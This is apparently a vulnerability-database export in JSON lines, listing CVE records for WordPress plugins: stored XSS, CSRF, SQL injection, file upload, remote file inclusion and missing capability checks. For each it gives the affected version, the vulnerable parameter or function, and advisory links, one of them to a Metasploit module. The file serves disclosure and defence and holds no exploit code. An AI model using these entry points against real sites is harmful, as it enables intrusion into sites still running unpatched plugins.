{"CVE_ID":"CVE-2024-25594","slug":"my-waze","versionImpact":"1.6","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Savvy Wordpress Development MyWaze allows Stored XSS.This issue affects MyWaze: from n\/a through 1.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/my-waze\\\/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/my-waze\\\/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1325","slug":"woomotiv","versionImpact":"3.4.3","description":"The Live Sales Notification for Woocommerce \u2013 Woomotiv plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.3. This is due to missing or incorrect nonce validation on the 'ajax_cancel_review' function. This makes it possible for unauthenticated attackers to reset the site's review count via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/tags\\\/3.4.1\\\/lib\\\/class-backend.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/tags\\\/3.4.1\\\/lib\\\/class-backend.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woomotiv\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woomotiv\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9057","slug":"curatorio","versionImpact":"1.9","description":"The Curator.io: Show all your social media posts in a beautiful feed. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018feed_id\u2019 attribute in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/953d64f2-a514-48e9-9ab3-f9a793ad953a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/953d64f2-a514-48e9-9ab3-f9a793ad953a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/curatorio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/curatorio\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9853","slug":"idsk-toolkit","versionImpact":"1.7.2","description":"The ID-SK Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001b452e-3f8a-4605-b77a-ba8fbd0d79d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001b452e-3f8a-4605-b77a-ba8fbd0d79d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idsk-toolkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idsk-toolkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8962","slug":"wpbits-addons-for-elementor","versionImpact":"1.5.2","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/elementor-config.php#L721\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/elementor-config.php#L721\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200392\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200392\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f735f05d-8178-46bd-894d-49ccfb31d304?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f735f05d-8178-46bd-894d-49ccfb31d304?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12528","slug":"wp-survey-and-poll","versionImpact":"1.7.5","description":"The WordPress Survey & Poll \u2013 Quiz, Survey and Poll Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsurveypoll_results' shortcode in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51cc6247-1948-4de1-b347-c7d818400777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51cc6247-1948-4de1-b347-c7d818400777?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12610","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'mj_smgt_remove_feetype' and 'mj_smgt_remove_category_new' AJAX actions in all versions up to, and including, 93.0.0. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3a7ca0-9325-4b50-a844-8eeb4047de1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3a7ca0-9325-4b50-a844-8eeb4047de1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2579","slug":"embed-lottie-player","versionImpact":"1.1.8","description":"The Lottie Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via File uploads in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the uploaded file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-lottie-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-lottie-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b85b314d-a155-4cec-95c9-0db4b9d8e59b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b85b314d-a155-4cec-95c9-0db4b9d8e59b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6462","slug":"dl-yandex-metrika","versionImpact":"1.2","description":"The DL Yandex Metrika WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0880fa33-3efa-4f50-83c8-4c90cb805eb9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0880fa33-3efa-4f50-83c8-4c90cb805eb9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7059","slug":"simple-featured-image","versionImpact":"1.3.1","description":"The Simple Featured Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slideshow\u2019 parameter in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-featured-image\\\/trunk\\\/templates\\\/slider.tpl.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-featured-image\\\/trunk\\\/templates\\\/slider.tpl.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-featured-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-featured-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4ecc01-7969-4ff6-8210-530835a43dbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4ecc01-7969-4ff6-8210-530835a43dbc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10025","slug":"advanced-custom-fields","description":"The WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below contains a remote file inclusion (RFI) vulnerability in core\/actions\/export.php. When the PHP configuration directive allow_url_include is enabled (default: Off), an unauthenticated attacker can exploit the acf_abspath POST parameter to include and execute arbitrary remote PHP code. This leads to remote code execution under the web server\u2019s context, allowing full compromise of the host.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20121223025326\\\/http:\\\/\\\/secunia.com:80\\\/advisories\\\/51037\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20121223025326\\\/http:\\\/\\\/secunia.com:80\\\/advisories\\\/51037\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_advanced_custom_fields_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_advanced_custom_fields_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-custom-fields\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-custom-fields\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d132d93b-509c-490d-8001-87147ed28c5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d132d93b-509c-490d-8001-87147ed28c5e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23856\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tenable.com\\\/plugins\\\/nessus\\\/63326\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/plugins\\\/nessus\\\/63326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-advanced-custom-fields-remote-file-inclusion\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-advanced-custom-fields-remote-file-inclusion\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/advanced-custom-fields\\\/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusion\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/advanced-custom-fields\\\/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0895","slug":"wp-coder","versionImpact":"2.5.3","description":"The WP Coder \u2013 add custom html, css and js code plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=2757782&old_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php&new=&new_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=2757782&old_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php&new=&new_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b6a9cd-4d29-4bd8-afa3-b5d455ad8340\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b6a9cd-4d29-4bd8-afa3-b5d455ad8340\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1919","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache-related settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024f4058-065b-48b4-a08a-d9732d4375cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024f4058-065b-48b4-a08a-d9732d4375cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5662","slug":"wp-sponsors","versionImpact":"3.5.0","description":"The Sponsors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sponsors' shortcode in all versions up to, and including, 3.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af04219-26c5-401d-94ef-11d2321f98bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af04219-26c5-401d-94ef-11d2321f98bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sponsors\\\/tags\\\/3.5.0\\\/includes\\\/class-wp-sponsors-shortcodes.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sponsors\\\/tags\\\/3.5.0\\\/includes\\\/class-wp-sponsors-shortcodes.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1982","slug":"wpvivid-backuprestore","versionImpact":"0.9.68","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the get_restore_progress() and restore() functions in all versions up to, and including, 0.9.68. This makes it possible for unauthenticated attackers to exploit a SQL injection vulnerability or trigger a DoS.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"name\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1205","slug":"wemanage-app-worker","versionImpact":"1.2.0","description":"The Management App for WooCommerce \u2013 Order notifications, Order management, Lead management, Uptime Monitoring plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the nouvello_upload_csv_file function in all versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8987","slug":"youzify","versionImpact":"1.3.0","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's youzify_media shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19c463d1-41fa-4386-b755-a14d1e68c5bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19c463d1-41fa-4386-b755-a14d1e68c5bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.0\\\/includes\\\/public\\\/core\\\/functions\\\/general\\\/youzify-profile-functions.php#L910\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.0\\\/includes\\\/public\\\/core\\\/functions\\\/general\\\/youzify-profile-functions.php#L910\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9642","slug":"editor-custom-color-palette","versionImpact":"3.3.7","description":"The Editor Custom Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e7f858c-945c-4d12-a2a6-113449ad890a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e7f858c-945c-4d12-a2a6-113449ad890a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/editor-custom-color-palette\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/editor-custom-color-palette\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/editor-custom-color-palette\\\/tags\\\/3.3.6\\\/asset\\\/eccp-custom-back-office.php#L1685\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/editor-custom-color-palette\\\/tags\\\/3.3.6\\\/asset\\\/eccp-custom-back-office.php#L1685\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11854","slug":"listdom","versionImpact":"3.7.0","description":"The Listdom \u2013 Business Directory and Classified Ads Listings WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018shortcode\u2019 parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listdom\\\/tags\\\/3.6.0\\\/templates\\\/search\\\/tpl.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listdom\\\/tags\\\/3.6.0\\\/templates\\\/search\\\/tpl.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200502\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200502\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listdom\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listdom\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12419","slug":"cf7-styler","versionImpact":"1.7.1","description":"The The Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. Version 1.7.0 patched the Reflected XSS issue, however, the arbitrary shortcode execution issue remains.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L295\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L295\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L405\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L405\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d78ea71-5886-488e-a660-0dc25129a8b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d78ea71-5886-488e-a660-0dc25129a8b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
